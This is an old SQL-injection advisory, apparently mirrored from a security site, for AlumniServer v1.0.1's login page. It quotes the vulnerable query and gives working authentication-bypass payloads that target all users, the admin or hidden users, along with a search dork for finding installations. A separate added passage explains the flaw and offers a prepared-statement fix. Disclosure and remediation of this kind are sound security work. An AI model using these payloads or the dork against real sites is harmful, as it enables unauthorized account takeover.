AlumniServer v-1.0.1 SQL Injection

2009.06.26
Credit: YEnH4ckEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

---------------------------------------------------------
SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
---------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL, for universities, schools and companies. Services for users include a profile page, ...
-->RELEASED: 2009-06-11

CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK: "AlumniServer project"
-->CATEGORY: AUTH-BYPASS (SQLi)
-->AFFECTED VERSION: CURRENT
-->Discovered bug date: 2009-06-16
-->Reported bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (Love you, little one!)

#####################
////////////////////
AUTH-BYPASS (SQLi):
////////////////////
#####################

<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

-----------
VULN FILE:
-----------

Path --> [HOME_PATH]/login.php
Lines --> 26, 32, 72

//Note: requestVar is a function against LFI and XSS mainly,
//avoiding register_globals ON, filtering \r\n, \r, \0, etc. and using htmlspecialchars.

...
26: $email=requestVar('login','',true);
...
32: $pwd=requestVar('password','',true);
...
72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line
...

-----------
EXPLOITS:
-----------

[!!!] Case-1: If there is only one user (rarely)...

~~~~~> E-Mail=y3nh4ck3r_at_gmail.com') OR 1=1 /*
~~~~~> Password=nothing

[!!!] Case-2: If there are more users...

[++] Note: Search for the admin's mail (http://[HOST]/[PATH]/Imprint.php):

~~~~~> E-Mail=[real_admin_mail]')/*
~~~~~> Password=nothing

[++] Note: Search for the first or second name.
[++] Note: AdminGn, AdminSn by default. Do not use id because it is generated randomly. With a registered user it is easy to get the necessary information.

~~~~~> E-Mail=y3nh4ck3r_at_gmail.com') OR gn='AdminGn' /*
~~~~~> Password=nothing

[!!!] Case-3: If admin is a hidden user...

~~~~~> E-Mail=y3nh4ck3r_at_gmail.com') OR hideuser='y' /*
~~~~~> Password=nothing
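The root cause at line 72 is string concatenation: requestVar() only applies htmlspecialchars(), which by default leaves the single quote untouched, so the quote in the submitted e-mail closes the literal and `/*` comments out the password check. The following is an added example, not AlumniServer's own code, showing a replacement for that lookup using PDO prepared statements; it assumes `$dbh` is a PDO connection and that `as_users` has the `email` and `password` columns the original query uses.

```php
<?php
// Added example (not from AlumniServer): hardened replacement for the
// login lookup at login.php line 72. Assumes $dbh is a PDO connection and
// the `as_users` table has `email` and `password` columns.

function authenticateUser(PDO $dbh, string $email, string $pwd): ?array
{
    // Exact match instead of LIKE: with LIKE, even a bound parameter lets
    // a submitted '%' act as a wildcard and match an arbitrary account.
    $stmt = $dbh->prepare(
        'SELECT * FROM `as_users` WHERE email = :email LIMIT 1'
    );
    // The value travels separately from the SQL text, so quotes, comment
    // sequences (/*) and OR clauses inside $email remain literal data.
    // This no longer depends on magic_quotes being on or off.
    $stmt->execute([':email' => $email]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($user === false) {
        return null;
    }
    // Compare the stored hash in PHP rather than in the WHERE clause so the
    // password can never shape the query. hash_equals() is constant-time.
    // The original stores md5($pwd); md5 is kept here only for drop-in
    // compatibility and should be migrated to password_hash()/password_verify().
    if (!hash_equals($user['password'], md5($pwd))) {
        return null;
    }
    return $user;
}

// Usage in login.php (constructed call, mirroring lines 26 and 32):
// $user = authenticateUser($dbh, requestVar('login', '', true),
//                          requestVar('password', '', true));
// if ($user === null) { /* reject the login attempt */ }
```

With this change the advisory's three payloads all fail: the e-mail field is compared verbatim, so no row matches, and the password is never part of the SQL at all.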

References:

http://seclists.org/bugtraq/2009/Jun/0235.html


Copyright 2024, cxsecurity.com